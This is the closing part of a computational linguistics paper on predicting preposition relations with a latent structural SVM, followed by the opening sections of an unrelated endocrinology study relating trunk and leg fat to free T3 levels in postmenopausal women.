Joachims, 2009), the loss is defined only over the part of the structure with the gold label. In this work, we use the standard Hamming loss over the entire structure, but scale the loss for the elements of h(y) by a parameter α < 1. This is a gen- eralization of the latent structural SVM, which corresponds to the setting α = 0. The intu- ition behind having a non-zero α is that in ad- dition to penalizing the learning algorithm if it violates the annotated part of the structure, we also incorporate a small penalty for the rest of the structure. Using these two inference procedures, we define the learning algorithm as Algorithm 1. The weight vector is initialized using Model 1. The algorithm then finds the best arguments and types for all ex- amples in the training set (steps 3-5). Doing so gives an estimate of the arguments and types for each example, giving us ‘fully labeled’ structured data. The algorithm then proceeds to use this data to train a new weight vector using the standard struc- tural SVM with the loss augmented inference listed above (step 6). These two steps are repeated several times. Note that as with the summation in Model 1, solving the inference problems described above is computationally inexpensive. Algorithm 1 Algorithm for learning Model 2 Input: Examples D = {xi,r(y∗i )}, where exam- ples are labeled only with the relation labels. 1: Initialize weight vector w using Model 1 2: for t = 1, 2, · · · do 3: for (xi,y∗i ) ∈ D do 4: ŷi ← LatentInf(w,xi,y∗i ) (Eq. 5) 5: end for 6: w ← LearnSSV M({xi, ŷi}) with the loss augmented inference of Eq. 6 7: end for 8: return w Algorithm 1 is parameterized by C and α. The parameter α controls the extent to which the hypoth- esized labels according to the previous iteration’s weight vector influence the learning. 237 4.4 Joint inference between preposition senses and relations By defining preposition relations as disjoint sets of preposition senses, we effectively have a hierarchi- cal relationship between senses and relations. This suggests that joint inference can be employed be- tween sense and relation predictions with a validity constraint connecting the two. The idea of employ- ing inference to combine independently trained pre- dictors to obtain a coherent output structure has been used for various NLP tasks in recent years, starting with the work of (Roth and Yih, 2004; Roth and Yih, 2007). We use the features defined by (Hovy et al., 2010), which we write as φs(x,s) for a given input x and sense label s, and train a separate preposition sense model on the SemEval data with features φs(x,s) using the structural SVM algorithm. Thus, we have two weight vectors – the one for predicting preposi- tion relations described earlier, and the preposition sense weight vector. At prediction time, for a given input, we find the highest scoring joint assignment to the relation, arguments and types and the sense, sub- ject to the constraint that the sense and the relation agree according to the definition of the relations. 5 Experiments and Results The primary research goal of our experiments is to evaluate the different models (Model 1, Model 2 and joint relation-sense inference) for predicting prepo- sition relations. In additional analysis experiments, we also show that the definition of preposition rela- tions indeed captures cross-preposition semantics by taking advantage of shared features and also high- light the need for going beyond the syntactic parser. 5.1 Types and Features Types As described in Section 3, we use WordNet hypernyms as one of the type categories. We use all hypernyms within four levels in the hypernym hier- archy for all senses. The second type category is defined by word- similarity driven clusters. We briefly describe the clustering process here. The thesaurus of (Lin, 1998) specifies similar lexical items for a given word along with a similarity score from 0 to 1. It treats nouns, verbs and adjectives separately. We use the score to cluster groups of similar words us- ing a greedy set-covering approach. Specifically, we randomly select a word which is not yet in a cluster as the center of a new cluster and add all words whose score is greater than σ to it. We re- peat this process till all words are in some clus- ter. A word can appear in more than one cluster because all words similar to the cluster center are added to the cluster. We repeat this process for σ ∈{0.1, 0.125, 0.15, 0.175, 0.2, 0.25}. By increas- ing the value of σ, the clusters become more selec- tive and hence smaller. Table 4 shows example noun clusters created using σ = 0.15. For a given word, identifiers for clusters to which the word belongs serve as type label candidates for this type category5. Features Our argument features, denoted by φA in Section 4.1, are derived from the preposition sense feature set of (Hovy et al., 2010) and extract the following from the argument: 1. Word, part-of- speech, lemma and capitalization indicator, 2. Con- flated part-of-speech (one of Noun, Verb, Adjective, Adverb, and Other), 3. Indicator for existence in WordNet, 4. WordNet synsets for the first and all senses, 5. WordNet lemma, lexicographer file names and part, member and substance holonyms, 6. Roget thesaurus divisions for the word, 7. The first and last two and three letters, and 8. Indicators for known af- fixes. Our type features (φT ) are simply indicators for the type label, conjoined with the type category. One advantage of abstracting word senses into re- lations is that we can share features across different prepositions. The base feature set (for both types and arguments) defined above does not encode in- formation about the preposition to be classified. We do so by conjoining the features with the preposi- tion. In addition, since the relation labels are shared across all prepositions, we include the base features as a shared representation between prepositions. We consider two variants of our feature sets. We refer to the features described above as the typed features. In addition, we define the typed+gen features by conjoining argument and type features of typed with the name of the genera- tor that proposes the argument. Recall that governor candidates are proposed by the dependency parser, or by the heuristics described earlier. Hence, for 5The clusters can be downloaded from the authors’ website. 238 Jimmy Carter; Ronald Reagan; richard nixon; George Bush; Lyndon Johnson; Richard M. Nixon; Gerald Ford metalwork; porcelain; handicraft; jade; bronzeware; carving; pottery; ceramic; earthenware; jewelry; stoneware; lacquerware degradation; erosion; pollution; logging; desertification; siltation; urbanization; felling; poaching; soil erosion; depletion; water pollution; deforestation expert; Wall Street analyst; analyst; economist; telecommunications analyst; strategist; media analyst fox news channel; NBC News; MSNBC; Fox News; CNBC; CNNfn; C-Span Tuesdays; Wednesdays; weekday; Mondays; Fridays; Thursdays; sundays; Saturdays Table 4: Examples of noun clusters generated using the set-covering approach for σ = 0.15 a governor, the typed+gen features would conjoin the corresponding typed features with one of parser, previous-verb, previous-noun, previous-adjective, or previous-word. 5.2 Experimental setup and data All our experiments are based on the Sem- Eval 2007 data for preposition sense disambigua- tion (Litkowski and Hargraves, 2007) comprising word sense annotation over 16176 training and 8058 examples of prepositions labeled with their senses. We pre-processed sentences with part-of- speech tags using the Illinois POS tagger and de- pendency graphs using the parser of (Goldberg and Elhadad, 2010)6. For the experiments described be- low, we used the relation-annotated training set to train the models and evaluate accuracy of prediction on the test set. We chose the structural SVM parameter C using five-fold cross-validation on a 1000 random exam- ples chosen from the training set. For Model 2, we picked α = 0.1 using a validation set consisting of a separate set of 1000 training examples. We ran Algorithm 1 for 20 rounds. Predicting the most frequent relation for a prepo- sition gives an accuracy of 21.18%. Even though the performance of the most-frequent relation label is poor, it does not represent the problem’s difficulty and is not a good baseline. To compare, for prepo- sition senses, using features from the neighboring words, (Ye and Baldwin, 2007) obtained an accuracy of 69.3%, and with features designed for the prepo- sition sense task, (Hovy et al., 2010) get up to 84.8% accuracy for the task. Our re-implementation of the latter system using a different set of pre-processing tools gets an accuracy of 83.53%. For preposition relations, our baseline system for 6We used the Curator (Clarke et al., 2012) for all pre- processing. relation labeling uses the typed feature set, but with- out any type information. This produces an accuracy of 88.01% with Model 1 and 88.64% with Model 2. We report statistical significance of results using our implementation of Dan Bikel’s stratified-shuffling based statistical significance tester7. 5.3 Main results: Relation prediction Our main result, presented in Table 5, compares the baseline model (without types) against other sys- tems, using both models described in Section 4. First, we see that adding type information (typed) improves performance over the baseline. Expand- ing the feature space (typed+gen) gives further im- provements. Finally, jointly predicting the relations with preposition senses gives another improvement. Setting Accuracy Model 1 Model 2 No types 88.01 88.64 typed 88.77 89.14 typed+gen 89.90∗ 89.43∗ Joint typed+gen & sense 89.99∗ 90.26∗† Table 5: Main results: Accuracy of relation labeling. Results in bold are statistically significant (p < 0.01) improvements over the system that is unaware of types. Superscripts ∗ and † indicate significant improvements over typed and typed+gen respectively at p < 0.01. For Model 2, the improvement of typed over the model with- out types is significant at p < 0.05. Our objective is not predicting preposition sense. However, we observe that with Model 2, jointly pre- dicting the sense and relations improves not only the performance of relation identification, but via joint inference between relations and senses also leads to a large improvement in sense prediction accuracy. Table 6 shows the accuracy for sense prediction. We 7http://www.cis.upenn.edu/∼dbikel/software.html 239 see that while Model 1 does not lead to a significant improvement in the accuracy, Model 2 gives an ab- solute improvement of over 1%. Setting Sense accuracy Hovy (re-implementation) 83.53 Joint + Model 1 83.78 Joint + Model 2 84.78∗ Table 6: Sense prediction performance. Joint inference with Model 1, while improving relation performance, does not help sense accuracy in comparison to our re- implementation of the Hovy sense disambiguation sys- tem. However, with Model 2, the improvement is statis- tically significant at p < 0.01. 5.4 Ablation experiments Feature sharing across prepositions In our first analysis experiment, we seek to highlight the utility of sharing features between different prepositions. To do so, we compare the performance of a sys- tem trained without shared features against the type- independent system, which uses shared features. To discount the influence of other factors, we use Model 1 in the typed setting without any types. Table 7 reports the accuracy of relation prediction for these two feature sets. We observed a similar improve- ment in performance even when type features are added or the setting is changed to typed+gen or with Model 2. Setting Accuracy Independent 87.17 + Shared 88.01 Table 7: Comparing the effect of feature sharing across prepositions. We see that having a shared representation that goes across prepositions improves accuracy of rela- tion prediction (p < 0.01). Different argument candidate generators Our second ablation study looks at the effect of the var- ious argument candidate generators. Recall that in addition to the dependency governor and object, our models also use the previous word, the previous noun, adjective and verb as governor candidates and the next noun as object candidate. We refer to the candidates generated by the parser as Parser only and the others as Heuristics only. Table 8 compares the performance of these two argument candidate generators against the full set using Model 1 in both the typed and typed+gen settings. We see that the heuristics give a better accu- racy than the parser based system. This is because the heuristics often contain the governor/object pre- dicted by the dependency. This is not always the case, though, because using all generators gives a slightly better performing system (not statistically significant). In the overall system, we retain the de- pendency parser as one of the generators in order to capture long-range governor/object candidates that may not be in the set selected by the heuristics. Feature sets Generator typed typed+gen Parser only 87.12 87.12 Heuristics only 87.63 88.84 All 88.01 89.12 Table 8: The performance of different argument candi- date generators. We see that considering a larger set of candidate generators gives a big accuracy improvement. 6 Discussion There are two key differences between Model 1 and 2. First, the former predicts only the relation label, while the latter predicts the entire structure. Table 9 shows example predictions of Model 2 for relation label and WordNet argument types. These examples show how the argument types can be thought of as an explanation for the choice of relation label. Input Relation Hypernyms governor object died of pneumonia Cause experience disease suffered from flu Cause experience disease recovered from flu StartState change disease Table 9: Example predictions according to Model 2. The hypernyms column shows a representative of the synset chosen for the WordNet types. We see that in the com- bination of experience and disease suggests the relation Cause while the change and disease indicate the rela- tion StartState. The main difference between the two models is in the treatment of the unlabeled (or latent) parts of the structure (namely, the arguments and the types) during training and inference. During training, for 240 each example, Model 1 aggregates features from all governors and objects even if they are possibly ir- relevant, which may lead to a much bigger model in terms of the number of active weights. On the other hand, for Model 2, Algorithm 1 uses the single high- est scoring prediction of the latent variables, accord- ing to the current parameters, to refine the parame- ters. Indeed, in our experiments, we observed that the number of non-zero weights in the weight vec- tor of Model 2 is much smaller than that of Model 1. For instance, in the typed setting, the weight vec- tor for Model 1 had 2.57 million elements while that for Model 2 had only 1.0 million weights. Similarly, for the typed+gen setting, Model 1 had 5.41 million non-zero elements in the weight vector while Model 2 had only 2.21 million non-zero elements. The learning algorithm itself is a generalization of the latent structural SVM of (Yu and Joachims, 2009). By setting α to zero, we get the latent struc- ture SVM. However, we found via cross-validation that this is not the best setting of the parameter. A theoretical understanding of the sparsity of weights learned by the algorithm and a study of its conver- gence properties is an avenue of future research. 7 Conclusion We addressed the problem of modeling semantic re- lations expressed by prepositions. We approached this task by defining a set of preposition relations that combine preposition senses across prepositions. Doing so allowed us to leverage existing annotated preposition sense data to induce a corpus for prepo- sition labels. We modeled preposition relations in terms of its arguments, namely the governor and ob- ject of the preposition, and the semantic types of the arguments. Using a generalization of the latent structural SVM, we trained a relation, argument and type predictor using only annotated relation labels. This allowed us to get an accuracy of 89.43% on re- lation prediction. By employing joint inference with a preposition sense predictor, we further improved the relation accuracy to 90.23%. Acknowledgments The authors wish to thank Martha Palmer, Nathan Schneider, the anonymous reviewers and the editor for their valuable feed- back. The authors gratefully acknowledge the support of the Defense Advanced Research Projects Agency (DARPA) Ma- chine Reading Program under Air Force Research Laboratory (AFRL) prime contract no. FA8750-09-C-0181. This material is also based on research sponsored by DARPA under agree- ment number FA8750-13-2-0008. The U.S. Government is au- thorized to reproduce and distribute reprints for Governmental purposes notwithstanding any copyright notation thereon. The views and conclusions contained herein are those of the authors and should not be interpreted as necessarily representing the of- ficial policies or endorsements, either expressed or implied, of DARPA, AFRL or the U.S. Government. References E. Agirre, T. Baldwin, and D. Martinez. 2008. Improv- ing parsing and PP attachment performance with sense information. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 317–325, Columbus, USA. T. Baldwin, V. Kordoni, and A. Villavicencio. 2009. Prepositions in applications: A survey and introduc- tion to the special issue. Computational Linguistics, 35(2):119–149. M. Chang, D. Goldwasser, D. Roth, and V. Srikumar. 2010a. Discriminative learning over constrained latent representations. In Proceedings of the Annual Meet- ing of the North American Association of Computa- tional Linguistics (NAACL), pages 429–437, Los An- geles, USA. M. Chang, V. Srikumar, D. Goldwasser, and D. Roth. 2010b. Structured output learning with indirect super- vision. In Proceedings of the International Conference on Machine Learning (ICML), pages 199–206, Haifa, Israel. J. Clarke, V. Srikumar, M. Sammons, and D. Roth. 2012. An NLP Curator (or: How I Learned to Stop Wor- rying and Love NLP Pipelines). In Proceedings of the International Conference on Language Resources and Evaluation (LREC), pages 3276–3283, Istanbul, Turkey. J. Cohen. 1960. A coefficient of agreement for nominal scales. Educational and Psychological Measurement, 20:37–46. D. Dahlmeier, H. T. Ng, and T. Schultz. 2009. Joint learning of preposition senses and semantic roles of prepositional phrases. In Proceedings of the Confer- ence on Empirical Methods for Natural Language Pro- cessing (EMNLP), pages 450–458, Singapore. D. Das, N. Schneider, D. Chen, and N. Smith. 2010. Probabilistic frame-semantic parsing. In Proceedings of Human Language Technologies: The 2010 Annual 241 Conference of the North American Chapter of the As- sociation for Computational Linguistics, pages 948– 956, Los Angeles, USA. C. Fillmore, C. Johnson, and M. Petruck. 2003. Back- ground to FrameNet. International Journal of Lexi- cography, 16(3):235–250. D. Gildea and D. Jurafsky. 2002. Automatic label- ing of semantic roles. Computational Linguistics, 28(3):245–288. Y. Goldberg and M. Elhadad. 2010. An efficient algo- rithm for easy-first non-directional dependency pars- ing. In Proceedings of Human Language Technolo- gies: The 2010 Annual Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics, pages 742–750, Los Angeles, USA. D. Hovy, S. Tratz, and E. Hovy. 2010. What’s in a prepo- sition? dimensions of sense disambiguation for an in- teresting word class. In Coling 2010: Posters, pages 454–462, Beijing, China. D. Lin. 1998. Automatic retrieval and clustering of sim- ilar words. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 768–774, Montreal, Canada. K. Litkowski and O. Hargraves. 2005. The Preposition Project. In ACL-SIGSEM Workshop on the Linguistic Dimensions of Prepositions and their Use in Computa- tional Linguistics Formalisms and Applications, pages 171–179, Colchester, UK. K. Litkowski and O. Hargraves. 2007. SemEval-2007 Task 06: Word-Sense Disambiguation of Prepositions. In Proceedings of the Fourth International Workshop on Semantic Evaluations (SemEval-2007), pages 24– 29, Prague, Czech Republic. K. Litkowski. 2012. Proposed Next Steps for The Prepo- sition Project. Technical Report 12-01, CL Research. A. Meyers, R. Reeves, C. Macleod, R. Szekely, V. Zielin- ska, B. Young, and R. Grishman. 2004. The Nom- Bank project: An interim report. In HLT-NAACL 2004 Workshop: Frontiers in Corpus Annotation, pages 24– 31, Boston, USA. T. O’Hara and J. Wiebe. 2009. Exploiting semantic role resources for preposition disambiguation. Computa- tional Linguistics, 35(2):151–184. M. Palmer, D. Gildea, and P. Kingsbury. 2005. The Proposition Bank: An Annotated Corpus of Semantic Roles. Computational Linguistics, 31(1):71–106. M. Palmer, D. Gildea, and N. Xue. 2010. Semantic Role Labeling, volume 3. Morgan & Claypool Publishers. V. Punyakanok, D. Roth, and W. Yih. 2008. The impor- tance of syntactic parsing and inference in semantic role labeling. Computational Linguistics, 34(2). D. Roth and W. Yih. 2004. A linear programming formu- lation for global inference in natural language tasks. In Proceedings of the Annual Conference on Compu- tational Natural Language Learning (CoNLL), pages 1–8, Boston, USA. D. Roth and W. Yih. 2007. Global inference for en- tity and relation identification via a linear program- ming formulation. Introduction to Statistical Rela- tional Learning. V. Srikumar and D. Roth. 2011. A joint model for extended semantic role labeling. In Proceedings of the Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), Edinburgh, Scotland. S. Tratz and D. Hovy. 2009. Disambiguation of prepo- sition sense using linguistically motivated features. In Proceedings of Human Language Technologies: The 2009 Annual Conference of the North American Chap- ter of the Association for Computational Linguistics, Companion Volume: Student Research Workshop and Doctoral Consortium, pages 96–100, Boulder, USA. S. Tratz. 2011. Semantically-enriched Parsing for Natu- ral Language Understanding. Ph.D. thesis, University of Southern California. I. Tsochantaridis, T. Hofmann, T. Joachims, and Y. Altun. 2004. Support vector machine learning for interde- pendent and structured output spaces. In Proceedings of the International Conference on Machine Learning (ICML), pages 104–111, Banff, Canada. P. Ye and T. Baldwin. 2006. Semantic role labeling of prepositional phrases. ACM Transactions on Asian Language Information Processing (TALIP), 5(3):228– 244. P. Ye and T. Baldwin. 2007. MELB-YB: Preposition sense disambiguation using rich semantic features. In Proceedings of the Fourth International Workshop on Semantic Evaluations (SemEval-2007), pages 241– 244, Prague, Czech Republic. C. Yu and T. Joachims. 2009. Learning structural SVMs with latent variables. In Proceedings of the Inter- national Conference on Machine Learning (ICML), pages 1–8, Montreal, Canada. B. Zapirain, E. Agirre, L. Màrquez, and M. Surdeanu. 2012. Selectional preferences for semantic role classi- fication. Computational Linguistics, pages 1–33. 242 work_nux47c5vxngynfvamxfsjsk2bu ---- 8:10 1425–1432X Nie, Y Xu and et al. Fat distribution and thyroid hormones RESEARCH Trunk fat and leg fat in relation to free triiodothyronine in euthyroid postmenopausal women Xiaomin Nie*, Yiting Xu*, Xiaojing Ma, Yun Shen, Yufei Wang and Yuqian Bao Department of Endocrinology and Metabolism, Shanghai Jiao Tong University Affiliated Sixth People’s Hospital; Shanghai Clinical Center for Diabetes; Shanghai Key Clinical Center for Metabolic Disease; Shanghai Diabetes Institute; Shanghai Key Laboratory of Diabetes Mellitus, Shanghai, China Correspondence should be addressed to X Ma or Y Bao: maxiaojing@sjtu.edu.cn or yqbao@sjtu.edu.cn *(X Nie and Y Xu contributed equally to this work) Abstract Background: A high level of free triiodothyronine (FT3) within the reference range may be a potential metabolic risk marker. However, the relationship between different fat depots and FT3 has remained unclear. Objective: We aimed to explore the relationships between segmental fat distribution and FT3 in euthyroid middle-aged and elderly men and postmenopausal women. Methods: A total of 891 subjects (394 men and 497 women) were enrolled. A bioelectrical impedance analyzer was used to measure total, trunk, arm and leg fat mass (FM) and fat percentage (fat%). The leg fat mass to trunk fat mass ratio (LTR) was calculated to evaluate the relative distribution of leg fat compared with that of trunk fat. Thyroid hormones were measured by electrochemical luminescence immunoassay. Results: FT3 in men did not change significantly with increases in LTR quartiles, while FT3 in women decreased significantly (P for trend = 0.004). In multivariate linear regression analysis, multiple metabolic and cardiovascular risk factors were adjusted. The LTR was negatively related to FT3 in women (P < 0.05). After further mutual adjustment for trunk fat and leg fat parameters, trunk FM and fat% were positively related to FT3, while leg FM and fat% were negatively related to FT3 in women (all P < 0.05). Conclusions: In euthyroid postmenopausal women, trunk fat was positively correlated with FT3, whereas leg fat was negatively correlated with FT3. Our findings supported that a high level of FT3 within the reference range was related to adverse fat distribution. Introduction Obesity is the key pathogenic factor of type 2 diabetes and cardiovascular disease (1). The disease risk associated with obesity is related not only to fat content but also to fat distribution. Abdominal obesity characterized by an ‘apple-shape’ significantly increases the risk of type 2 diabetes and cardiovascular disease (2). In contrast to that, a ‘pear-shape’ with most fat accumulating in the lower body is found to have metabolic and cardiovascular protective effects (3). Free triiodothyronine (FT3) is the bioactive form of thyroxines. FT3 regulates basal metabolic rate, promotes fat decomposition and acts on the cardiovascular system through adrenergic signaling (4). Previous studies have found that a high level of FT3 within the reference range was positively related to BMI and waist circumference (5, 6). Non-alcoholic fatty liver disease (NAFLD) is one of the most common complications of obesity. In recent years, some studies found that a high level of FT3 within -19-0394 Key Words f trunk fat f leg fat f trunk fat mass to leg fat mass ratio f free triiodothyronine Endocrine Connections (2019) 8, 1425–1432 ID: 19-0394 8 10 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access mailto:maxiaojing@sjtu.edu.cn mailto:yqbao@sjtu.edu.cn https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 1426 PB–8 8:10 the reference range was related to the risk of NAFLD and multiple adverse metabolic and cardiovascular risk factors (5, 7, 8), which suggests that a high level of FT3 within the reference range may be a potential adverse metabolic risk marker. The middle-aged and elderly population is at high risk of metabolic and cardiovascular disease; thus, it is meaningful to explore the associations between different fat depots and FT3 in this age group. BMI and waist circumference are simple indexes to evaluate obesity, but cannot be used to reflect the distribution of different fat depots. Segmental fat depots (trunk, arm and leg) measured by segmental bioelectrical impedance analysis (sBIA) are highly consistent with those measured by dual energy X-ray absorptiometry (9). sBIA can accurately evaluate body fat content with simple operation and lightweight size. None of the previous studies have focused on associations between segmental fat distribution and FT3. In the present study, we aimed to explore the relationship between segmental fat distribution and FT3 in euthyroid middle-aged and elderly men and postmenopausal women. Trunk fat and leg fat were found to have an inverse relationship with metabolic and cardiovascular disease in previous studies (3, 10, 11). The relationship between arm fat and cardiovascular metabolic risk was nonsignificant or weak (12, 13). Thus, we calculated the leg FM to trunk FM ratio (LTR) to study the relationship between a tendency of fat to accumulate in the legs rather than trunk and FT3. Materials and methods Study population Men and postmenopausal women aged 50 years or older were recruited from Shanghai communities from October 2015 to July 2016. Postmenopausal status was defined as at least 1 year of amenorrhea in the absence of other medical conditions (14). The methods of population recruitment and data collection were described in our previous study (15). All participants provided informed consent and received questionnaires, a physical examination, laboratory tests and segmental fat measurements. The exclusion criteria included a history of thyroid disease with thyroxine supplement or anti-thyroid therapy; abnormal thyroid function; a history of diabetes or cardiovascular disease; moderate-to-severe anemia; malignancy or an intracranial mass lesion; severe kidney or liver dysfunction; acute infection; hypoalbuminemia; taking lipid-lowering drugs, hypotensive drugs, weight-loss pills, glucocorticoids, sex hormones, amiodarone or lithium. The study was approved by the Ethics Committee of the Shanghai Jiao Tong University Affiliated Sixth People’s Hospital and was carried out following the guidelines of the 1964 Declaration of Helsinki. Anthropometric and biochemical assessments Height, body weight and blood pressure were measured according to standard methods, which were described in our previous study (15). BMI was equal to the body weight (kg) divided by the height squared (m2). Systolic blood pressure (SBP) and diastolic blood pressure (DBP) were determined by the mean blood pressure from three measurements taken at 3-min intervals. All subjects underwent a 75-g oral glucose tolerance test in the morning after an overnight fast of 10 h. The measurements of fasting plasma glucose (FPG), 2-h plasma glucose (2 h PG), glycated hemoglobin A1c (HbA1c), fasting insulin (FINS), triglyceride (TG), total cholesterol (TC), high-density lipoprotein cholesterol (HDL-c), and low-density lipoprotein cholesterol (LDL-c) were performed according to methods described in our previous study (15). Estradiol (E2) was detected by chemiluminescent microparticle immunoassays on an Architect i2000SR analyzer (Abbott GmbH & Co. KG). The level of insulin resistance was evaluated by the homeostasis model assessment of insulin resistance (HOMA-IR) with the following formula: HOMA-IR = FINS (mU/L) × FPG (mmol/L)/22.5 (16). A Cobas e601 analyzer (Roche Diagnostics GmbH) was used to measure FT3, free thyroxine (FT4) and thyroid-stimulating hormone (TSH). The reference range and intra- and interassay coefficients for FT3 were 3.10–6.80 pmol/L, <7.0 and <8.0%, respectively; for FT4, they were 12.00–22.00 pmol/L, <5.0 and <7.0%, respectively; and for TSH, they were 0.27–4.20 mIU/L, <3.0 and <8.0%, respectively. Measurement of segmental fat distribution An automatic bioelectrical impedance analyzer (TBF-418B; Tanita Corp., Tokyo, Japan) was used to measure total, trunk, arm and leg fat mass (FM) and fat percentage (fat%) according to a previously described method (15). To evaluate the tendency of fat accumulation in the legs rather than the trunk, the LTR was calculated as leg FM (kg) divided by trunk FM (kg). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 14278:10 Statistical analysis The normality of the distribution of variables was evaluated by the Kolmogorov–Smirnov test. Normally distributed variables are expressed as the mean ± standard deviation. Variables with a skewed distribution are expressed as the median (interquartile range). For normally distributed variables, one-way ANOVA was used for trend analysis. For skewed variables, the Kruskal–Wallis H-test was used for trend analysis. Partial correlation analysis was used to explore the age- and BMI-adjusted relationships between fat parameters and thyroid hormones. Multivariate linear regression analysis was used to explore the relationship between segmental fat parameters and thyroid hormones. Considering close correlations among segmental fat parameters, multicollinearity was analyzed for each linear regression model. A variance inflation factor > 10 indicated serious multicollinearity. SPSS version 22.0 (SPSS, Inc.) statistical software was used for all data analyses. A two- tailed P value <0.05 was considered statistically significant. Results Clinical characteristics of the study participants The study included 891 subjects with an age range of 50–81 years (mean age 61 ± 5 years). There were 394 men and 497 postmenopausal women. The medians of BMI, total FM and total fat% were 23.0 (21.2–25.1) kg/m2, 16.0 (12.2–20.1) kg, and 25.9 (20.0–32.3)%, respectively. The medians of FT3, FT4 and TSH were 4.93 (4.60–5.29) pmol/L, 16.55 (15.31–17.71) pmol/L and 2.17 (1.55–2.87) mIU/L, respectively. Both men and women were divided into four groups according to LTR quartiles: Q1 < 0.58, Q2 0.58–0.63, Q3 0.64–0.73 and Q4 > 0.73 for men; and Q1 < 0.64, Q2 0.64–0.70, Q3 0.71–0.80 and Q4 > 0.80 for women (Table 1). In men, age, BMI, total FM, total fat%, DBP, FPG, FINS, HOMA-IR and E2 decreased significantly with increasing LTR quartiles (all P for trend < 0.05). In women, BMI, total FM, total fat%, SBP, FPG, HbA1c, FINS, HOMA-IR, TG and E2 decreased significantly with increasing LTR quartiles (all P for trend < 0.05). In both genders, HDL-c significantly increased with increasing LTR quartiles (all P for trend < 0.05). Changes of thyroid hormones in LTR quartiles In men, FT3, FT4 and TSH did not significantly change with increasing LTR quartiles (all P > 0.05). In women, only FT3 significantly decreased with increasing LTR quartiles. The medians of FT3 from the Q1 to the Q4 group of LTR quartiles were 4.84 (4.56–5.19) pmol/L, 4.78 (4.48–5.15) pmol/L, 4.74 (4.52–5.03) pmol/L and 4.64 (4.34–4.93) pmol/L (P for trend = 0.004). In women, FT4 and TSH did not change significantly with increasing LTR quartiles (all P > 0.05, Fig. 1). Partial correlation analysis of segmental fat parameters and thyroid hormones In men and women, trunk FM was 7.5 (5.5–9.9) kg and 9.9 (7.4–12.1) kg, trunk fat% was 21.0 (16.5–25.3)% and 30.9 (25.8–35.1)%, arm FM was 1.0 (0.8–1.2) kg and 1.4 (1.2–1.9) kg, arm fat% was 1.5 (1.3–1.7)% and 2.6 (2.1–3.1)%, leg FM was 4.8 (3.8–5.9) kg and 6.8 (5.8–8.0) kg, leg fat% was 7.0 (6.1–8.0)% and 11.9 (11.1–12.8)%, and the LTR was 0.63 (0.58–0.73) and 0.70 (0.64–0.80), respectively. Age and BMI were adjusted in the partial correlation analysis. In men, none of the fat parameters were related to FT3 (all P > 0.05). In women, total FM (r = 0.098, P = 0.030), total fat% (r = 0.138, P = 0.002), trunk FM (r = 0.124, P = 0.006) and trunk fat% (r = 0.132, P = 0.003) were positively related to FT3, while the LTR was negatively related to FT3 (r = −0.147, P = 0.001) (Fig. 2). In women, leg FM, leg fat%, arm FM and arm fat% were not related to FT3 (all P > 0.05). None of the segmental fat parameters were related to FT4 or TSH in both men and women (all P > 0.05). Multivariate linear regression analysis for thyroid hormones Multivariate linear regression analysis was used to explore the relationships between segmental fat parameters and thyroid hormones in women (Table 2). In model 1, age, HOMA-IR, DBP, LDL-c and E2 were adjusted. Only LTR was negatively related to FT3 (standardized β = −0.116, P < 0.05), while total fat and other segmental fat parameters were not related to FT3 (all P > 0.05). None of the segmental fat parameters were related to FT4 or TSH (all P > 0.05). Considering a significant and negative relationship between LTR and FT3, trunk fat and leg fat might be confounding factors of one another. Thus, we further created model 2. In model 2, all confounding factors involved in model 1 were included. In addition, leg FM and trunk FM were mutually adjusted, and leg fat% and trunk fat% were mutually adjusted. Trunk FM and trunk This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:21PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0394 https://ec.bioscientifica.com X Nie, Y Xu and et al. Fat distribution and thyroid hormones 1428 PB–8 8:10 fat% were both positively related to FT3 (standardized β = 0.303 and 0.218, respectively, all P < 0.05). Leg FM and leg fat% were both negatively related to FT3 (standardized β = −0.285 and −0.195, respectively, all P < 0.05). Discussion In the present study, we found that trunk fat accumulation was related to increased FT3 in euthyroid postmenopausal women, while increased leg fat accumulation was related to decreased FT3. These relationships were independent of multiple metabolic and cardiovascular risk factors. In men, none of the fat parameters were related to thyroid hormones. Obesity is closely related to FT3. Previous studies have found that BMI and waist circumference were positively related to FT3 in the euthyroid population (5, 6). A Mendelian randomization study indicated that higher BMI or FM played a causal role in increasing FT3 levels (17). Simple obesity indexes, such as BMI have been widely used in these studies. There have been few studies of associations between precisely-measured fat distribution and FT3. Lambrinoudaki et al. measured abdominal subcutaneous Table 1 Clinical characteristics of subjects. Parameters LTR quartiles P for trendQ1 Q2 Q3 Q4 Men n 98 99 99 98 – Age (years) 63 (58–67) 62 (57–66) 61 (56–65) 59 (56–65) 0.026 BMI (kg/m2) 23.9 (22.4–25.5) 24.4 (22.2–26.3) 23.5 (22.2–25.0) 22.0 (19.5–23.4) <0.001 Total FM (kg) 16.0 (12.9–18.7) 15.4 (12.6–18.8) 13.0 (11.0–15.3) 8.7 (6.3–11.4) <0.001 Total fat% 23.1 (20.0–25.3) 21.8 